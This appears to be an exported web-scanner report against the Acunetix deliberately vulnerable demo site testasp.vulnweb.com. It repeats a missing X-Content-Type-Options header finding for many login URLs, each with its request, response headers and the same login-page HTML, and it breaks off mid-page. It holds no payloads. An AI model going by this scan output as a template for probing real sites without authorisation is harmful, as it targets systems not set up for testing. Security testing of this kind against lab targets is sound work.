<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | X-Content-Type-Options |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- 